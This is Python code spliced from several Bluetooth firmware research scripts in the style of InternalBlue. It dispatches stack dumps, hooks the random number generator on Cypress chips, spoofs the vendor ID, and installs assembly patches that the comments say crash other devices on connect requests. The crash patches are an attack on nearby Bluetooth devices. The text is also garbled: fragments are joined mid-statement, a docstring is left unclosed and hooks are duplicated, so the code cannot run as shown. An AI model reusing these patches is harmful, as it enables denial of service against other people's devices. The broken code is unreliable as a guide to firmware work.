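 def recvPacket(self, record) -> None:
     """Dispatch vendor-specific HCI events that carry a firmware stack dump.

     Invoked for every received HCI record. Records that are not HCI events,
     or whose event code is not 0xFF (vendor-specific event), are ignored.
     The leading bytes of the event payload identify the firmware family that
     produced the dump and select the matching ``handle*StackDump`` method.

     Args:
         record: sequence whose first element is the parsed HCI packet.

     Returns:
         None. The handlers are called for their side effects only.
     """
     hcipkt = record[0]
     if not isinstance(hcipkt, HCI_Event):
         return
     if hcipkt.event_code != 0xFF:
         return
     data = hcipkt.data
     # A vendor-specific event with an empty payload has no sub-event byte to
     # dispatch on; without this guard data[0] below raises IndexError.
     if not data:
         return
     # TODO Android 8 introduced special handling for 0x57 HCI_VSE_SUBCODE_DEBUG_INFO_SUB_EVT,
     # stackdumps might no longer work
     if data[0] == 0x57:
         self.handleNexus6pStackDump(hcipkt)
     if data[0:4] == p32(0x039200F7):
         self.handleNexus5StackDump(hcipkt)
     # The S10 and the evaluation board share this header, which is generated
     # by bthci_event_vs_initializeCoredumpHdr(); both handlers are run.
     if data[0:2] == p16(0x031B):
         self.handleEvalStackDump(hcipkt)
         self.handleS10StackDump(hcipkt)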
# --- RNG takeover (CYW20735) -------------------------------------------------
# Redirect the firmware's random number generation into our own hook.
# NOTE(review): FUN_RNG, ASM_LOCATION_RNG and the handler-table slot below are
# tied to the CYW20735 ROM image this script was written against; running it
# against another chip or firmware version may patch unrelated code.

# Step 1: turn the original RNG routine into an immediate return. patchRom()
# replaces exactly 4 bytes, and one `bx lr` is 2 bytes, so the stub is
# written twice to fill the slot.
patch = asm("bx lr; bx lr", vma=FUN_RNG)
if not internalblue.patchRom(FUN_RNG, patch):
    internalblue.logger.critical("Could not disable original RNG!")
    exit(-1)

# Step 2: reuse the Launch_RAM HCI command handler, which is broken and
# therefore unused, as the entry point for our RNG code. Its handler-table
# entry sits at 0x1425BC and normally holds launch_RAM+1; it was located by
# searching the dump for bthci_cmd_vs_HandleLaunch_RAM+1. Entries in this
# table store the function address with the low bit set, hence the +1.
LAUNCH_RAM_HANDLER_ENTRY = 0x1425BC
if not internalblue.patchRom(LAUNCH_RAM_HANDLER_ENTRY, p32(ASM_LOCATION_RNG + 1)):
    internalblue.logger.critical("Could not implement our launch RAM fix!")
    exit(-1)

internalblue.logger.info("Installed all RNG hooks.")

# Completion is signalled through a global flag instead of a nested HCI
# Read_RAM: issuing Read_RAM from inside the callback would require yet
# another callback and does not work reliably, so the result cannot be
# collected recursively. Polling this host-side flag is still far faster
# than polling a status register inside the Bluetooth firmware.
internalblue.rnd_done = False


def rngStatusCallback(record):
    hcipkt = record[0]  # get HCI Event packet
    exit(-1)

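# Install the assembly patches that crash the other device on connect requests.
# Two snippets are placed in firmware RAM (the LMP 00 table lookup and the
# LMP VSC existence check) and the firmware's own code paths are redirected
# to them. The ASM_* / HOOK_* constants are specific to one firmware image.
internalblue.logger.info(
    "installing assembly patches to crash other device on connect requests...")

# Fix: this used to be `progress_log = internalblue.logger.info(...)`, but
# Logger.info() returns None, so every writeMem() below was already receiving
# progress_log=None. Binding None explicitly keeps the name available for any
# later code while making the (absent) progress reporting visible.
progress_log = None

# Write the ASM snippet for the LMP 00 table lookup into RAM.
code = asm(ASM_SNIPPET_LMP_00_LOOKUP, vma=ASM_LOCATION_LMP_00_LOOKUP)
if not internalblue.writeMem(address=ASM_LOCATION_LMP_00_LOOKUP,
                             data=code,
                             progress_log=progress_log):
    internalblue.logger.critical("error!")
    exit(-1)

# Install the predefined hook for the LMP table lookup. The slot holds a
# function pointer; the +1 matches the firmware's convention of storing
# function addresses with the low bit set.
if not internalblue.writeMem(address=HOOK_LMP_00_LOOKUP,
                             data=p32(ASM_LOCATION_LMP_00_LOOKUP + 1),
                             progress_log=progress_log):
    internalblue.logger.critical("error!")
    exit(-1)

# Write the ASM snippet for the LMP VSC existence check into RAM.
code = asm(ASM_SNIPPET_VSC_EXISTS, vma=ASM_LOCATION_VSC_EXISTS)
if not internalblue.writeMem(
        address=ASM_LOCATION_VSC_EXISTS, data=code, progress_log=progress_log):
    internalblue.logger.critical("error!")
    exit(-1)

# All send_lmp functions live in ROM, so the existence check cannot be hooked
# with a plain RAM write: a ROM patch replaces the code at HOOK_VSC_EXISTS
# with an unconditional branch into our snippet.
# NOTE(review): this assumes ASM_LOCATION_VSC_EXISTS is within reach of a
# single `b` from HOOK_VSC_EXISTS; asm() should fail with an assembler error
# otherwise — confirm for the target firmware.
patch = asm("b 0x%x" % ASM_LOCATION_VSC_EXISTS, vma=HOOK_VSC_EXISTS)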
if not internalblue.patchRom(HOOK_VSC_EXISTS, patch):
        address=ASM_LOCATION_RNG, data=code, progress_log=None):
    internalblue.logger.critical("error!")
    exit(-1)

# Silence the firmware's own RNG so that only our hook produces random
# numbers. patchRom() replaces exactly 4 bytes and a `bx lr` is 2 bytes,
# hence the pair of returns.
patch = asm("bx lr; bx lr", vma=FUN_RNG)
if not internalblue.patchRom(FUN_RNG, patch):
    internalblue.logger.critical("Could not disable original RNG!")
    exit(-1)

# CYW20819: the Launch_RAM HCI command handler is broken, which makes its
# handler-table slot a convenient place to hang our RNG code. The slot at
# 0xF2884 normally points to launch_RAM+1; it is repointed to
# ASM_LOCATION_RNG+1 (0x219001 for the RAM region used here). Function
# pointers in this table carry the low bit set, hence the +1.
launch_ram_slot = 0xF2884
if not internalblue.patchRom(launch_ram_slot, p32(ASM_LOCATION_RNG + 1)):
    internalblue.logger.critical("Could not implement our launch RAM fix!")
    exit(-1)

# bcs_taskDeactivate_blocking crashes the chip once the target memory region
# at 0x219000 is in use, so it is turned into an immediate return as well.
# NOTE(review): like the slot above, 0x79AC6 is specific to the CYW20819 ROM
# image; on any other firmware this overwrites unrelated code.
bcs_task_deactivate = 0x79AC6
patch = asm("bx lr; bx lr", vma=bcs_task_deactivate)
if not internalblue.patchRom(bcs_task_deactivate, patch):
    internalblue.logger.critical(
        "Could not disable original bcs_taskDeactivate_blocking!")
    exit(-1)

internalblue.logger.info("Installed all RNG hooks.")
"""
We cannot call HCI Read_RAM from this callback as it requires another callback (something goes wrong here),
# Older devices such as the Nexus 5 only accept LMP BPCS from Broadcom; they
# do not know about Cypress yet. Overwrite the vendor ID word so that we
# present ourselves as Broadcom (0x0F).
VENDOR_ID_ADDRESS = 0x2020f0
BROADCOM_VENDOR_ID = b'\x0f\x00\x00\x00'


def _write_ram_or_die(address, data):
    """Write `data` into firmware RAM at `address`, aborting the script on failure."""
    if not internalblue.writeMem(address=address, data=data, progress_log=None):
        internalblue.logger.critical("error!")
        exit(-1)


internalblue.logger.info("Changing vendor ID from Cypress to Broadcom.")
_write_ram_or_die(VENDOR_ID_ADDRESS, BROADCOM_VENDOR_ID)

# Place the LMP BPSC table-lookup snippet in RAM and point the predefined
# hook slot at it. The +1 keeps the low bit of the function pointer set, as
# the firmware expects for such entries.
internalblue.logger.info("Writing ASM snippet for LMP BPSC table lookup.")
code = asm(ASM_SNIPPET_LMP_00_LOOKUP, vma=ASM_LOCATION_LMP_00_LOOKUP)
_write_ram_or_die(ASM_LOCATION_LMP_00_LOOKUP, code)

internalblue.logger.info("Installing predefined hook for LMP BPSC table lookup.")
_write_ram_or_die(HOOK_LMP_00_LOOKUP, p32(ASM_LOCATION_LMP_00_LOOKUP + 1))

# Place the LMP BPSC existence-check snippet in RAM.
internalblue.logger.info("Writing ASM snippet for LMP BPSC existence check.")
code = asm(ASM_SNIPPET_VSC_EXISTS, vma=ASM_LOCATION_VSC_EXISTS)
_write_ram_or_die(ASM_LOCATION_VSC_EXISTS, code)

# All send_lmp functions are in ROM, so the existence check cannot be hooked
# through a RAM write: a ROM patch at HOOK_VSC_EXISTS branches into the
# snippet instead.
# NOTE(review): HOOK_VSC_EXISTS and ASM_LOCATION_VSC_EXISTS are firmware
# specific; the branch must also be within reach of a single `b`.
internalblue.logger.info("Installing LMP BPSC existence hook patch...")
patch = asm("b 0x%x" % ASM_LOCATION_VSC_EXISTS, vma=HOOK_VSC_EXISTS)
if not internalblue.patchRom(HOOK_VSC_EXISTS, patch):
    internalblue.logger.critical("error!")
    exit(-1)